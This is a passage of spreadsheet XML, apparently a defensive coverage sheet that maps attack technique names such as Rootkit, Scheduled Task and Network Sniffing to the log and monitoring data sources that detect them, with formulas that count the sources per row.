      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A10" s="11" t="s">
        <v>69</v>
      </c>
      <c r="B10" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Malware reverse engineering</v>
      </c>
      <c r="C10" s="8" t="s">
        <v>1111</v>
      </c>
      <c r="D10">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E10">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="H10" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:B)</f>
        <v>Binary Padding</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A11" s="11" t="s">
        <v>70</v>
      </c>
      <c r="B11" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C11" s="8" t="s">
        <v>1112</v>
      </c>
      <c r="D11">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H11" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:B)</f>
        <v>Application Window Discovery</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A12" s="11" t="s">
        <v>71</v>
      </c>
      <c r="B12" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C12" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D12">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E12">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H12" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A13" s="11" t="s">
        <v>72</v>
      </c>
      <c r="B13" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C13" s="8" t="s">
        <v>1113</v>
      </c>
      <c r="D13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H13" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A14" s="11" t="s">
        <v>73</v>
      </c>
      <c r="B14" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C14" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D14">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E14">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H14" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:B)</f>
        <v>Port Monitors</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A15" s="11" t="s">
        <v>74</v>
      </c>
      <c r="B15" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C15" s="8" t="s">
        <v>1115</v>
      </c>
      <c r="D15">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H15" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A16" s="11" t="s">
        <v>75</v>
      </c>
      <c r="B16" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C16" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D16">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E16">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H16" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:B)</f>
        <v>Accessibility Features</v>
      </c>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A17" s="11" t="s">
        <v>76</v>
      </c>
      <c r="B17" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D17">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H17" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
    </row>
    <row r="18" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A18" s="11" t="s">
        <v>77</v>
      </c>
      <c r="B18" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process use of network,Process monitoring</v>
      </c>
      <c r="C18" s="8" t="s">
        <v>1117</v>
      </c>
      <c r="D18">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E18">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H18" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:B)</f>
        <v>Application Deployment Software</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A19" s="11" t="s">
        <v>78</v>
      </c>
      <c r="B19" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C19" s="8" t="s">
        <v>1118</v>
      </c>
      <c r="D19">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E19">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H19" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A20" s="11" t="s">
        <v>79</v>
      </c>
      <c r="B20" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>API monitoring,BIOS,EFI</v>
      </c>
      <c r="C20" s="8" t="s">
        <v>1119</v>
      </c>
      <c r="D20">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E20">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H20" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:B)</f>
        <v>System Firmware</v>
      </c>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A21" s="11" t="s">
        <v>80</v>
      </c>
      <c r="B21" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C21" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D21">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E21">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H21" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:B)</f>
        <v>Automated Exfiltration</v>
      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A22" s="11" t="s">
        <v>81</v>
      </c>
      <c r="B22" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C22" s="8">
        <v>100</v>
      </c>
      <c r="D22">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E22">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="H22" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:B)</f>
        <v>Remote Services</v>
      </c>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A23" s="11" t="s">
        <v>82</v>
      </c>
      <c r="B23" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C23" s="8" t="s">
        <v>1187</v>
      </c>
      <c r="D23">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E23">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H23" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A24" s="11" t="s">
        <v>83</v>
      </c>
      <c r="B24" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C24" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D24">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E24">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H24" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:B)</f>
        <v>Shortcut Modification</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A25" s="11" t="s">
        <v>84</v>
      </c>
      <c r="B25" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C25" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D25">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E25">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H25" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:B)</f>
        <v>Custom Cryptographic Protocol</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A26" s="11" t="s">
        <v>85</v>
      </c>
      <c r="B26" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C26" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D26">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H26" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:B)</f>
        <v>Data from Removable Media</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A27" s="11" t="s">
        <v>86</v>
      </c>
      <c r="B27" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C27" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D27">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E27">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H27" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:B)</f>
        <v>Multiband Communication</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A28" s="11" t="s">
        <v>87</v>
      </c>
      <c r="B28" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
      <c r="C28" s="8" t="s">
        <v>1120</v>
      </c>
      <c r="D28">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E28">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="H28" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:B)</f>
        <v>Obfuscated Files or Information</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A29" s="11" t="s">
        <v>88</v>
      </c>
      <c r="B29" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C29" s="8" t="s">
        <v>1121</v>
      </c>
      <c r="D29">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E29">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H29" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A30" s="11" t="s">
        <v>89</v>
      </c>
      <c r="B30" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C30" s="8" t="s">
        <v>1117</v>
      </c>
      <c r="D30">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E30">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H30" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:B)</f>
        <v>Scheduled Transfer</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A31" s="11" t="s">
        <v>90</v>
      </c>
      <c r="B31" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C31" s="8" t="s">
        <v>1122</v>
      </c>
      <c r="D31">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E31">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H31" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A32" s="11" t="s">
        <v>91</v>
      </c>
      <c r="B32" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C32" s="8" t="s">
        <v>1123</v>
      </c>
      <c r="D32">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H32" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:B)</f>
        <v>Modify Existing Service</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A33" s="11" t="s">
        <v>92</v>
      </c>
      <c r="B33" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</v>
      </c>
      <c r="C33" s="8" t="s">
        <v>1124</v>
      </c>
      <c r="D33">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E33">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="H33" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:B)</f>
        <v>Standard Cryptographic Protocol</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A34" s="11" t="s">
        <v>93</v>
      </c>
      <c r="B34" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C34" s="8" t="s">
        <v>1125</v>
      </c>
      <c r="D34">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E34">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H34" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:B)</f>
        <v>System Owner/User Discovery</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A35" s="11" t="s">
        <v>94</v>
      </c>
      <c r="B35" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C35" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D35">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E35">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H35" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A36" s="11" t="s">
        <v>95</v>
      </c>
      <c r="B36" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C36" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D36">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E36">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H36" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:B)</f>
        <v>Service Execution</v>
      </c>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A37" s="11" t="s">
        <v>96</v>
      </c>
      <c r="B37" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C37" s="8" t="s">
        <v>1117</v>
      </c>
      <c r="D37">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E37">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H37" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:B)</f>
        <v>Masquerading</v>
      </c>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A38" s="11" t="s">
        <v>97</v>
      </c>
      <c r="B38" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C38" s="8" t="s">
        <v>1126</v>
      </c>
      <c r="D38">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E38">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H38" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:B)</f>
        <v>Logon Scripts</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A39" s="11" t="s">
        <v>98</v>
      </c>
      <c r="B39" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C39" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D39">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E39">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H39" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:B)</f>
        <v>DLL Search Order Hijacking</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A40" s="11" t="s">
        <v>99</v>
      </c>
      <c r="B40" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C40" s="8" t="s">
        <v>1127</v>
      </c>
      <c r="D40">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E40">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H40" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:B)</f>
        <v>Data from Network Shared Drive</v>
      </c>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A41" s="11" t="s">
        <v>100</v>
      </c>
      <c r="B41" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C41" s="8" t="s">
        <v>1128</v>
      </c>
      <c r="D41">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E41">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H41" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:B)</f>
        <v>Network Sniffing</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A42" s="11" t="s">
        <v>101</v>
      </c>
      <c r="B42" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C42" s="8" t="s">
        <v>1129</v>
      </c>
      <c r="D42">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E42">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H42" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Command and Control Channel</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A43" s="11" t="s">
        <v>102</v>
      </c>
      <c r="B43" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C43" s="8" t="s">
        <v>1107</v>
      </c>
      <c r="D43">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E43">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H43" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:B)</f>
        <v>Change Default File Association</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A44" s="11" t="s">
        <v>103</v>
      </c>
      <c r="B44" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="8" t="s">
        <v>1130</v>
      </c>
      <c r="D44">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H44" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A45" s="11" t="s">
        <v>104</v>
      </c>
      <c r="B45" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Services,Process command-line parameters</v>
      </c>
      <c r="C45" s="8" t="s">
        <v>1119</v>
      </c>
      <c r="D45">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E45">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H45" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:B)</f>
        <v>File System Permissions Weakness</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A46" s="11" t="s">
        <v>105</v>
      </c>
      <c r="B46" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C46" s="8">
        <v>100</v>
      </c>
      <c r="D46">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E46">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="H46" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:B)</f>
        <v>Software Packing</v>
      </c>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A47" s="11" t="s">
        <v>106</v>
      </c>
      <c r="B47" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C47" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D47">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E47">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="H47" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:B)</f>
        <v>Network Service Scanning</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A48" s="11" t="s">
        <v>107</v>
      </c>
      <c r="B48" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C48" s="8" t="s">
        <v>1123</v>
      </c>
      <c r="D48">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E48">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H48" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:B)</f>
        <v>Windows Management Instrumentation</v>
      </c>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A49" s="11" t="s">
        <v>108</v>
      </c>
      <c r="B49" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C49" s="8" t="s">
        <v>1131</v>
      </c>
      <c r="D49">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E49">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="H49" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A50" s="11" t="s">
        <v>109</v>
      </c>
      <c r="B50" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C50" s="8" t="s">
        <v>1132</v>
      </c>
      <c r="D50">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E50">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H50" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A51" s="11" t="s">
        <v>110</v>
      </c>
      <c r="B51" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C51" s="8" t="s">
        <v>1118</v>
      </c>
      <c r="D51">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E51">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H51" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:B)</f>
        <v>New Service</v>
      </c>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A52" s="11" t="s">
        <v>111</v>
      </c>
      <c r="B52" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C52" s="8" t="s">
        <v>67</v>
      </c>
      <c r="D52">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E52">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H52" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:B)</f>
        <v>Shared Webroot</v>
      </c>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A53" s="11" t="s">
        <v>112</v>
      </c>
      <c r="B53" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Data loss prevention,File monitoring</v>
      </c>
      <c r="C53" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="H53" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Physical Medium</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A54" s="11" t="s">
        <v>113</v>
      </c>
      <c r="B54" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C54" s="8" t="s">
        <v>1134</v>
      </c>
      <c r="D54">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E54">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="H54" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:B)</f>
        <v>Scheduled Task</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A55" s="11" t="s">
        <v>114</v>
      </c>
      <c r="B55" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C55" s="8" t="s">
        <v>1135</v>
      </c>
      <c r="D55">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E55">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="H55" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:B)</f>
        <v>Indicator Blocking</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A56" s="11" t="s">
        <v>115</v>
